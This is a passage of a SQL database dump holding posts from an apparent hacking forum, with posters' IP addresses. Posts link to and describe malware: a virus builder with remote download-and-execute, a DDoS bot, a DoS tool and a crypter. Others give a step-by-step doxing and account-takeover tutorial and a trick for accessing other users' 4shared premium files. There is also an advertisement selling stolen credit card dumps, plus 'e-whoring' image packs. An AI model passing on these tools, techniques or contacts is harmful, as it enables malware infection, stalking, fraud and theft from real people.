Permissions[/b] What is still better about this plugins, is that you can block some actions for other plugins, not just MyBB default actions, here the majority are about plugins actions. [hr] [b]Adding Reputation as a Sort Option in Memberlist[/b] Added Reputation Search Option in Memberlist. [hr] [b]Whois lookup[/b] When you click on a IP on a post, you can do a Whois lookup on the IP. [hr] [b]Fassim Anti Spam[/b] I added this Plugin to block PROXY access and to block some countries in future.', '41.174.5.180', '699270580', '1', '0', '0', '0', '1', 'c11110fb3100bf367eb63cb3f2a4d19f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('98', '38', '0', '16', '[tut] How to lie like a pro', '0', '1', 't3h jok3r', '1342112159', 'This tutorial will teach you how to lie without getting caught. [u][b]Requirements[/b][/u] [list] [*]Smart Thinker [*]Must not stam while talking [/list] [b]Step 1[/b] Don\'t talk too slow or way too fast. [b]Step 2[/b] Stand close, look into the eyes of who you are talking to, don\'t blink too much, and don\'t bring anything between you two while talking. [b]Step 3[/b] Listen to what they are saying and don\'t forget what you said. Then use facts while lying, never change what your said (You may add something to it but don\'t change your dialogue) and if you are about to get caught then go all the way back or use what they said against them. ALWAYS QUESTION THEM SO THEY GO SPEECHLESS. [b]Step 4[/b] Don\'t stam or act weird, stay confident. That\'s pretty much it.', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', '332dea947bfd9b4bc17e6c3cd9c29350', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('99', '39', '0', '17', 'E-Whoring Pics Pack of 11 girls', '0', '1', 't3h jok3r', '1342112687', 'This pack consists of 11 girls and its broken up into 2 parts. Download links below. http://mir.cr/0RUCWDGD http://mir.cr/MWOCUNAD [u]Preview [/u] http://i.imgur.com/XVuks.jpg http://i.imgur.com/b3wGL.jpg Enjoy.', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', '30c261e5dd4208182d81a1a82c9fd0b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('100', '40', '0', '17', '600 pic ewhore pack', '0', '1', 't3h jok3r', '1342112738', 'Download set1 http://mir.cr/0DQEFUPC set2 http://mir.cr/1ZWZNM5O set3 http://mir.cr/TS0WGMBR Enjoy.', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', 'b9a49aedac090354ac3c5119bcb02d68', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('101', '33', '88', '20', 'RE: Heavens Crypter FUD', '0', '5', 'Timmy', '1342113463', 'Crypter updated also replaced the dead link. Enjoy!', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', '42e25ca2e36ea13ed8402caf6faa29c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('102', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '4', 'Triple H', '1342113556', 'Thanks Reborn. Good Luck setting up this logger.', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', '236386c7cdf3bb37383d8680f6d26387', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('103', '41', '0', '15', 'Virus O Matic.. Virus Creator', '0', '4', 'Triple H', '1342113990', 'This is a simple tool called Virus O Matic which makes a very quick malware / virus when u need a quick virus to fuck with your friends with for fun :) Its Key features are : Steals Serial keys Gay porn attack Message spammer Open, close CD/DVD Rom Loop Remote .exe downloader and execute Blocks website of your choice Redirects google to a site of your choice Takes Screenshot and emails to Disables Task Maneger , Keyboard and Mouse , registry editor , custom themes Turns off screen Adds itself to startup There are more features but i think that\'s all of them , also the creator disabled the update feature for some reason and NO I AM NOT THE CREATOR OF THIS PROGRAM , ALL CREDITS GO TO : My BR iz Broak for making this Here is a GIF image to show u how to use this [img]http://4.bp.blogspot.com/-k1i_PzY73kw/T2Bch4zyiJI/AAAAAAAAAL0/XiJ4VRBzxfI/s1600/Untitled.gif[/img] [lock][b]Download link[/b] : http://www.mediafire.com/download.php?5bkz7a4d768ztrz[/lock] [quote] iLikeMonayyy [/quote]', '41.174.59.151', '699284375', '1', '0', '1', '1352012241', '1', 'ce032514da426508b3b7ebe560d525ce', '0', '1352012241'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('104', '42', '0', '12', '[tut]Hacking 4shared accounts access premium user files', '0', '4', 'Triple H', '1342114102', 'Hi LH Going to share a very useful and easy trick with you all :) Hack file hosting 4shared accounts using[u][b] Google[/b][/u] yeah datz it You can download all the files that are at a premium user Here is the trick Go to Google and in search bar type : site:4shared.com dir + Now choose from the huge list of results Example Screenshot below (Warning large image): [spoiler] [img]http://i48.tinypic.com/taod9h.jpg[/img] [/spoiler] Credits: Hax366 Enjoy!', '41.174.59.151', '699284375', '1', '0', '4', '1342114203', '1', 'd373616933bb3c29364f9a318c7d5299', '0', '1342114203'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('105', '43', '0', '7', 'How did you find us?', '0', '1', 't3h jok3r', '1342114322', 'How did you find L33thacking.com?', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', 'e3f41fde03ba161f819526df6d77411b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('106', '6', '14', '4', 'RE: Welcome to L33THacking.com', '0', '13', 'unixmoon', '1342145924', 'I am pleased to be here and share my knowledge !', '146.171.254.97', '-1834221983', '0', '0', '0', '0', '1', '27e56520ceaae6b518bedc719d584d50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('107', '44', '0', '8', 'Don\'t Wake Me Up', '0', '13', 'unixmoon', '1342146175', '[video=youtube]http://www.youtube.com/watch?v=QOowQeKyNkQ[/video]', '146.171.254.97', '-1834221983', '0', '0', '0', '0', '1', 'a1d90b64951c9ebc0b12357f1ff9af89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('108', '43', '105', '7', 'RE: How did you find us?', '0', '11', 'Reminiscing ?', '1342191266', 'Was recommended to me, and advertised well.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', '7b8c14f425fc4d98344542d70a83aa8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('109', '4', '8', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '11', 'Reminiscing ?', '1342191464', 'Well written tutorial, my only advise is that you\'ve missed general proxy\'s out.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', 'b1df189df91816f7582eb9d135c27df2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('110', '44', '107', '8', 'RE: Don\'t Wake Me Up', '0', '5', 'Timmy', '1342191756', 'Nice song by Chris Brown but I\'m more into hip hop. Who are your favorite singers?', '41.174.54.183', '699283127', '1', '0', '0', '0', '1', '4f9039030520e6b484c50edafce914c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('111', '45', '0', '49', 'Varied Sections', '0', '11', 'Reminiscing ?', '1342191908', 'Well, the forum is constructed well, designed and managed well. The only issue is, the varies of sections. What I mean by this is, that the forum only caters for \"Hacking\" why not bring along the useful stuff that bond with hacking such as crypters and how they work etc. If you get my drift that i\'m going for, things related to the current sections.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', 'e95ea5c13cf272750848777c5fce8547', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('113', '45', '111', '49', 'RE: Varied Sections', '0', '1', 't3h jok3r', '1342192466', '[quote=\'Reminiscing ?\' pid=\'111\' dateline=\'1342191908\'] Well, the forum is constructed well, designed and managed well. The only issue is, the varies of sections. What I mean by this is, that the forum only caters for \"Hacking\" why not bring along the useful stuff that bond with hacking such as crypters and how they work etc. If you get my drift that i\'m going for, things related to the current sections. [/quote] Thanks for the suggestion. The reason why there are not much sections and only discussions on basic hacking because L33THacking is new and the 3rd rule of making a forum is not to overload your site with forums because you want your forums to be active and don\'t want inactivity in most of your forums neither confuse your members into where to post.', '41.174.54.183', '699283127', '1', '0', '0', '0', '1', 'aa3902e66d8b795e4f3264787cb7d5de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('114', '45', '113', '49', 'RE: Varied Sections', '0', '11', 'Reminiscing ?', '1342192981', '[quote=\'t3h jok3r\' pid=\'113\' dateline=\'1342192466\'] [quote=\'Reminiscing ?\' pid=\'111\' dateline=\'1342191908\'] Well, the forum is constructed well, designed and managed well. The only issue is, the varies of sections. What I mean by this is, that the forum only caters for \"Hacking\" why not bring along the useful stuff that bond with hacking such as crypters and how they work etc. If you get my drift that i\'m going for, things related to the current sections. [/quote] Thanks for the suggestion. The reason why there are not much sections and only discussions on basic hacking because L33THacking is new and the 3rd rule of making a forum is not to overload your site with forums because you want your forums to be active and don\'t want inactivity in most of your forums neither confuse your members into where to post. [/quote] Indeed, but your forum is limited. So the users have less to choose from when registering.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', 'a1b6534d1710453cc1674982d0b792ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('115', '45', '114', '49', 'RE: Varied Sections', '0', '1', 't3h jok3r', '1342193354', '[quote=\'Reminiscing ?\' pid=\'114\' dateline=\'1342192981\'] [quote=\'t3h jok3r\' pid=\'113\' dateline=\'1342192466\'] [quote=\'Reminiscing ?\' pid=\'111\' dateline=\'1342191908\'] Well, the forum is constructed well, designed and managed well. The only issue is, the varies of sections. What I mean by this is, that the forum only caters for \"Hacking\" why not bring along the useful stuff that bond with hacking such as crypters and how they work etc. If you get my drift that i\'m going for, things related to the current sections. [/quote] Thanks for the suggestion. The reason why there are not much sections and only discussions on basic hacking because L33THacking is new and the 3rd rule of making a forum is not to overload your site with forums because you want your forums to be active and don\'t want inactivity in most of your forums neither confuse your members into where to post. [/quote] Indeed, but your forum is limited. So the users have less to choose from when registering. [/quote] Ummm could you elaborate what you mean by limited?', '41.174.54.183', '699283127', '1', '0', '0', '0', '1', 'dfc9caad6499ae8ad9d3d93f4c7776b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('116', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '7', 'Romdu62', '1342205168', 'Awesome VPN. Thanks for this, very helpful.', '41.174.11.149', '699272085', '0', '0', '0', '0', '1', '44454364022ff0984388ba1cd5a3a4e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('117', '45', '111', '49', 'RE: Varied Sections', '0', '11', 'Reminiscing ?', '1342211111', 'They have less to choose from.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', 'a572cd0c15d12d387877cf9d2e8c52b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('118', '46', '0', '19', '[Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '6', 'Trusted_hacker', '1342262132', 'The selection price will depend on the guiding prices for each separate country. At the same time, there are no setups. You can run a small test of 20-50 items to check your software for an individual country or a 50-100 Mix (free); however, this option is offered on a one-time basis and only to a new customer. FOR USA DUMPS CLASSIC/STANDARD: $20 GOLD/PLAT:$30 SIGN/CORP/BIZ/WORLD/PURCH: $35 DISCO: $25 AMEX: $16 (ALL) CANADA 101 CLASSIC/STANDARD: $40 GOLD/PLAT/SIG/BIZZ/CORP/PURCH/WORLD: $50 CANADA 201 CLASSIC/STANDARD: $30 GOLD/PLAT/SIG/BIZZ/CORP/PURCH/WORLD: $40 FOR EU 101 DUMPS CLASSIC/STANDARD: $100 GOLD/PLAT: $120 CORP/WORLD/BIZZ/SIGN: $130 INFINITE: $150 RULES: Payments only through LR Instant Delivery No Minimum order Dumps checking by ask, I don\'t replace checked stuff! Lost/Stolen Replace in 24 hours!! Replayce always will be checked! No replace for region lock! No Dumps with pins No Free No Test Dumps!! BINLIST AVAILABLE ONLY FOR GOOD CUSTOMERS CONTACT : ICQ : 612113985 EMAIL : lua.xuan2000@yandex.com', '94.46.241.97', '1580134753', '0', '0', '0', '0', '1', '1c3a3a8cc2cff26855c2e6a16e6bf1f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('119', '47', '0', '19', '[Junk][Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '6', 'Trusted_hacker', '1342262231', 'The selection price will depend on the guiding prices for each separate country. At the same time, there are no setups. You can run a small test of 20-50 items to check your software for an individual country or a 50-100 Mix (free); however, this option is offered on a one-time basis and only to a new customer. FOR USA DUMPS CLASSIC/STANDARD: $20 GOLD/PLAT:$30 SIGN/CORP/BIZ/WORLD/PURCH: $35 DISCO: $25 AMEX: $16 (ALL) CANADA 101 CLASSIC/STANDARD: $40 GOLD/PLAT/SIG/BIZZ/CORP/PURCH/WORLD: $50 CANADA 201 CLASSIC/STANDARD: $30 GOLD/PLAT/SIG/BIZZ/CORP/PURCH/WORLD: $40 FOR EU 101 DUMPS CLASSIC/STANDARD: $100 GOLD/PLAT: $120 CORP/WORLD/BIZZ/SIGN: $130 INFINITE: $150 RULES: Payments only through LR Instant Delivery No Minimum order Dumps checking by ask, I don\'t replace checked stuff! Lost/Stolen Replace in 24 hours!! Replayce always will be checked! No replace for region lock! No Dumps with pins No Free No Test Dumps!! BINLIST AVAILABLE ONLY FOR GOOD CUSTOMERS CONTACT : ICQ : 612113985 EMAIL : lua.xuan2000@yandex.com', '94.46.241.97', '1580134753', '0', '0', '0', '0', '1', 'b9278ebe173113bea879ff268454398a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('120', '46', '118', '19', '[Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '1', 't3h jok3r', '1342265729', 'This thread has been junked.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('121', '47', '119', '19', '[Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '1', 't3h jok3r', '1342266079', 'This thread has been junked.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('122', '47', '119', '19', '[Junk][Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '1', 't3h jok3r', '1342266080', 'This thread has been junked.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('123', '45', '117', '49', 'RE: Varied Sections', '0', '1', 't3h jok3r', '1342266617', '[quote=\'Reminiscing ?\' pid=\'117\' dateline=\'1342211111\'] They have less to choose from. [/quote] Right but I can\'t overload my website with forums and have more inactivity in those sections. I\'m looking forward to make my current sections active first and then create more sections. What you see at the moment is not everything, we have some more blackhat sections for upgraded members.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', 'aec19e9487d0357cfd56786db23cee9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('124', '6', '14', '4', 'RE: Welcome to L33THacking.com', '0', '5', 'Timmy', '1342266771', 'Thanks for clarifying the admin tasks. I guess it makes it easier to understand what to report to who.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', '3c54fbb59420515c9f5d7ab46dfa5bdc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('125', '48', '0', '21', '[Strong] Anonymous DoSer _z0r0_in C #', '0', '8', 'spacefish36', '1342303751', '[align=center][img]http://www.nextgn.com/wp-content/uploads/2011/04/anon.jpg[/img][/align] [b]Proof[/b] (Warning: Large picture) [spoiler] [img]http://puu.sh/t5Cw[/img] [/spoiler] [b]Scan[/b] https://www.virustotal.com/file/8ac9f45f1114268b8ce3f77a6625ff4d6261388994c5c82b9c549974549b0f7c/analysis/1336229161/ [b]Download[/b] [lock]http://goo.gl/X9Xo6[/lock]', '41.174.8.40', '699271208', '0', '0', '1', '1352012301', '1', '054588a88df686194e7e4284111df2dc', '0', '1352012301'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('126', '49', '0', '21', 'Pandora DDOS Bot [Direct Link]', '0', '8', 'spacefish36', '1342304133', '[align=center][img]http://i.imgur.com/GfSB4.png[/img] [b]Download Link[/b] [quote] http://www.mediafire.com/?4jmj1j38xxlbmsa [/quote] Found this on opensc.ws, Great DDOS bot. Enjoy guys! Regards, spacefish36 [/align]', '41.174.8.40', '699271208', '0', '0', '8', '1342304236', '1', '77f6b2bce310a9fa3f66c5a2e40a96f0', '0', '1342304236'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('127', '43', '105', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1342389820', 'Lol I recommended you and thanks for joining and being active.', '41.174.16.115', '699273331', '1', '0', '0', '0', '1', 'e4b2b651eb6e50d14b9b116c121477fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('128', '4', '109', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '1', 't3h jok3r', '1342390102', '[quote=\'Reminiscing ?\' pid=\'109\' dateline=\'1342191464\'] Well written tutorial, my only advise is that you\'ve missed general proxy\'s out. [/quote] Actually a VPN is better than a proxy so he kept a VPN has a major concern.', '41.174.16.115', '699273331', '1', '0', '0', '0', '1', 'aea197022eb47cfe46e65657a3f3f476', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('129', '41', '103', '15', 'RE: Virus O Matic.. Virus Creator', '0', '1', 't3h jok3r', '1342392396', 'Awesome. Thanks for this but don\'t you think those n00bs would be happy after getting a virus?', '41.174.16.115', '699273331', '1', '0', '0', '0', '1', '631e2911874b51cdd55b5e63a9bde7e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('130', '41', '103', '15', 'RE: Virus O Matic.. Virus Creator', '0', '4', 'Triple H', '1342392556', 'Happy, they should throw a party and call me.', '41.174.16.115', '699273331', '1', '0', '0', '0', '1', 'b1f73c01dd42bb53b013e437c1091fc9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('131', '42', '104', '12', 'RE: [tut]Hacking 4shared accounts access premium user files', '0', '2', 'Apathy', '1342393326', 'Wow nice share I did not know about this thanks.', '173.206.139.19', '-1378972909', '0', '0', '0', '0', '1', '5fac59f0b210d0c1c70f89f864312778', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('132', '50', '0', '12', '[tut]How to DOX', '0', '1', 't3h jok3r', '1342395175', '[color=#00BFFF]DOXing is my favorite blackhat technique because who ever messes with me online gets DOXed and hacked with the info I have. [/color] [u][b]Requirements[/b][/u] [list] [*] Notepad [*] Email Address of the Victim [/list] [b]What is a DOX?[/b] DOX is NOT hacking. DOXing is when you get a persons information from the internet without asking the victim. You find out their address, name, age, etc. Example by LH: http://pastebin.com/eXVxALWX [b]How can I use a DOX to hack?[/b] You can use it to answer [i]security questions[/i] or [i]Social Engineer[/i]. [b]How to DOX?[/b] Lets say our victims email address is [b]alien@hotmail.com[/b]. [color=#FF4500]So first what I would do is try grabbing information of my victim using [i][b]Roxer Doxer[/b][/i] (It\'s a great program that fetches the victims address, name and phone number. It doesn\'t work sometimes) If you don\'t get any information, then you will get /canada and a country. The country is right but the \"/canada\" is wrong. [/color] NOTE IT DOWN. [color=#FFD700]Now go on pipl.com and search using the email address. Now not all the results will be of the victims so be careful but have the results open and view each link and check.[/color] [color=#32CD32]Then using the email, search on YouTube.com, Facebook.com and startpage.com(Google).[/color] [color=#FF1493]Note down the results and you can use Google but startpage is safer and provides the safe exact results Google would provide because it\'s made by Google. Just paste the email address and search, then again on google/startpage search again but this time with any username you found from pipl.com. When you search on Google, look through all the results you will find the things you can\'t imagine the victim has left behind. Ex: MSN ID, Skype ID, Alternative Emails, Online banking account IDs also what kinds of communities they join. You can even add them and chat with them and get more info. Now if they join a gaming community so it\'s obvious that they like gaming. [/color] [color=#9400D3]Now type in the email address appending Myspace on Google. Ex: [b]alien@hotmail.com[/b] Myspace (This will get you his Myspace on which the victim must have surely left either his hobbies or picture). [/color] [color=#A9A9A9]Then go on whitepages and search them on whitepages.com to confirm their address or name. [/color] [u]Now that\'s pretty much it. Now if you have to go deep/more blackhat then read below.[/u] [color=#800000]Now try the password reset on all their emails. I mean look at the options and confirm the details you have also you find out what location they really are in because if they have a mobile pwd reset option then it will show the country code which will prove their location.[/color] [color=#FFFFFF]So now whatever the case be, if they are part of huge websites such as PayPal, Facebook etc you can SE the reps using the information you have and get access to their accounts. [/color] [color=#1E90FF]To get their IP, you can find a good IP grabber from Google. [/color] [b]Download Link for Roxer Doxer[/b] [quote] http://www.mediafire.com/?1nd2ixs3fkq8asn [/quote] Hope you liked my tutorial. Enjoy!', '41.174.7.183', '699271095', '1', '0', '1', '1343951235', '1', 'd727bc1e13b9da3fa9717cbe11a9c878', '0', '1343951235'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('155', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '1', 't3h jok3r', '1343951289', 'Thanks I SE\'d my first kindle today. It wasn\'t that hard after all and nice layout.', '41.174.14.148', '699272852', '1', '0', '0', '0', '1', 'dfce7ccca024c80bc72958e4cf1fd34b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('133', '51', '0', '11', 'DON\'T USE GOOGLE!!!', '0', '1', 't3h jok3r', '1342395331', 'Google tracks all your searches even without your permission as well as your IP address. I recommend using [url=https://startpage.com/]Startpage[/url] which is enhanced by Google so it will provide the exact same results Google would provide but on Startpage it doesn\'t track your IP and you can view the website you get from the result with a proxy provided on each link on Startpage. Enjoy!', '41.174.7.183', '699271095', '1', '0', '0', '0', '1', '34f29b70965c5ebd93f2dafb23ed68ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('134', '52', '0', '9', '?? Adsense Secrets - What Google Never 